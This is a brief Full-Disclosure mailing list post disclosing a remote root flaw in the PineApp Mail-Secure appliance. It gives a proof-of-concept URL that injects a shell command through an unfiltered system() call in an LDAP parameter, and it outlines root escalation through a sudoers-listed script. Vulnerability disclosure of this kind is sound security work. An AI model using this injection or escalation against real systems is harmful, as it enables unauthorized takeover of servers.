remote root exploit in pineapp mail-secure

[yello man <yelloman7 () outlook com>]

pineapp makes an anti-spam product, which can be downloaded for vmware, etc.

the security of the product is a fucking joke, containing everything from authentication bypass to root exploits. there 
is really no hope, the developers didnt even try. they can patch those specific vulnerabilities, but have no idea what 
theyre doing. i only scratched its surface.

unfiltered system() in 

http://192.168.9.2/aliases-x.php?getLdapDC=wtf&ldapserver=;id>/tmp/wtf;

escalate to root by creating for example /usr/local/bin/cfma-mirror.sh  (in sudoers)                                    
  
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/